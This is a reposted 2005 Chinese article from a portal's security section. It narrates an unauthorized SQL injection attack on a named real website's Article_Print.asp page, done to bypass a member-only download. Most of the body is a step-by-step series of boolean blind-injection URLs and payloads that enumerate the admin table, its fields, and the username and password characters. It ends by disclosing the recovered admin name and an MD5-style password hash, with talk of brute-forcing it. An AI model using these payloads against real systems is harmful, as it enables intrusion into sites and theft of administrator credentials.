如果你觉得本站还不错,为方便下次访问,可以【加入收藏】 最快知道本站更新,请订阅切换到繁體中文
百姓生活网
首页 | 时尚女性 | 家有爱车 | 妈妈宝贝 | 美食厨房 | 亲亲大自然 | 爱上摄影 | 电脑学堂 | 我爱我家 | 健康人生 | 小小书房 | 壁纸下载 | 影视评论 | 学英语 | 商业
养殖 | 种殖 | 产业信息
子 栏 目 导 航: 电脑学堂硬件资讯 软件资讯 网页设计 实战地带 互联八卦 游戏世界
您现在的位置: 百姓生活网 >> 点点滴滴 >> 电脑学堂 >> 软件资讯 >> 信息安全 >> 正文
动力系统打印页面SQL注入漏洞

作者:佚名    文章来源:本站原创    点击数:    更新时间:2005-10-13
今天晚上没事,在网上闲逛,在黑客同盟看到一个关于溢出serv-U的动画教程和文章,想把它down下来看看,于是

我找到下载页面,一看~~~~,想哭,它只给会员才可以下载的。不能吧,既然说下就一定要把他下下来。

    于是我到处看看,他用的是动力的整站程序,拿出工具扫,什么都没扫到,整体上没有做太大的改动,

网上已经公布的漏洞,站长早已把它补上了。没办法,再找找别的吧,打开网站-打开一篇文章 在 地址栏中提

交 and 1=1 出现错误 看来Article_Show.asp文件已经做了过滤~接着,看到打印此文这个功能。点击,看到Article_Print.asp?Arti
cleID=4; 
提交http://www.asp163.net/Article_Print.asp?ArticleID=4'返回错误信息,

接着提交http://www.asp163.net/Article_Print.asp?ArticleID=4;页面正常返回

再提交http://www.asp163.net/Article_Print.asp?ArticleID=4 and 1=1 页面正常返回

http://www.asp163.net/Article_Print.asp?ArticleID=4 and 1=2 返回找不到该文章。看来怪狗没有没有注意到这个文件的问题哦!!
有了上面的条件基本上就可以断定这个页面存在SQL注入漏洞了(因为别的页面提交都返回错误信息)

下面我们就开始注入了,和别的SQL注入一样,
猜管理员帐号表
http://www.asp163.net/Article_Print.asp?ArticleID=4 and exists (select * from admin)成功返回

我们再来猜他的管理员表中是否有一个ID段
http://www.asp163.net/Article_Print.asp?ArticleID=4 and exists (select id from admin)
OK,页面返回正常,说明他的admin表中有个id的字段。

这里的意思是看看他的admin表中是否有username字段
页面返回正常,说明在admin中有一个username字段
我们继续猜他放密码的字段and exists (select password from admin)
返回正常的页面,说明他的admin表中有个password字段
好了,我们下面来猜他的管理员的id值and exists (select id from admin where id=1)
意思是看看他的admin表中是否有一个id=1的值
OK,返回了正常的页面,说明我们猜对了
有时候管理员的ID值不是1,那么我们可以把ID=的值换成别的,2,3,4,等等一直到页面正常返回为止。

下面我们来猜他的管理员的名字长度
 and exists (select id from admin where len(username)<6 and id=1)
这里我们猜他的管理员长度小于6,呵呵,返回了正常的页面,还好,名字不是太长,
我们一个个来实验好了and exists (select id from admin where len(username)=5 and id=1)
返回了正常的页面,好了用户名的长度我们已经猜出了为5

下面我们来我们的重点任务-猜帐号
用户名字段长度
 and 1=(select min(id)from admin where len(username)>5) 

这是密码字段长
 and 1=(select min(id)from admin where len(password)<10) 

 and 1=(select min(id)from admin where mid(username,1,1)='a')
破用户名! 
and 1=(select id from admin where asc(mid(username,1,1))>120)
ID=2
and 2=(select id from admin where id=2 and asc(mid(username,1,1))>120)

把MID部分改就行!
right(user,2)表示从右边开始的两个字符。
left(user,2)表示从左边开始的两个字符! 
所以你先用left(user,1)='c'得到第一位,那就left(user,2)='ca' 

我们再来猜他的密码的asc值
 and 1=(select min(id)from admin where len(password)<10)返回错误
 and 1=(select min(id)from admin where len(password)=16)正常返回页面,到这里我就有点高兴不起来了,因为很有可能管理员的密码是md5加密的。

如果密码是数字的话还好办,用工具暴力破解几分钟就可以破出来,但是如果是数字加字母的呢?放心不要紧,MD5我们照样破别管那些,继续破。

    我快累死了,终于把管理员的用户名和密码都破出来了,用户名:admin  密码:ad901c854c52987b 。
每错,果然是MD5加密的。
    有些人看到MD5加密的可能就会拿出暴力破解软件慢慢的破解,包括我自己也是这样,如果过了20分钟密码还没有出来的话,那么我就不会用这个方法了,

发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
  • 上一篇文章:

  • 下一篇文章:
  • 赞助商链接: | 阅读过这篇文章的网友,同时还还阅读了以下几篇文章:
    ldb文件 是什么?
    留言本谢绝SPAM,防址垃圾留
    动力文章系统漏洞的检测
    动易网络发布的漏洞补丁公告
    动力文章上传漏洞的本地利用
    动力3.51存在严重的文件上传漏洞
    动力(My Power)系统SQL注射漏洞
    MY动力系统3.51常见问题解答汇集(2)
    MY动力系统3.51常见问题解答汇集(1)
    原版动力3.51整合动网7.0SP2详细安装说明!

    本栏目最近更新的图片文章:
    Google

    学习强大的Regsvr32命令

    在一台服务器上实现多个We
    网友评论:(只显示最新10条。评论内容只代表网友观点,请注意礼貌用语,与本站立场无关!)

    ©2005 百姓生活网 www.y8u8.com 琼ICP备13000608号 网站地图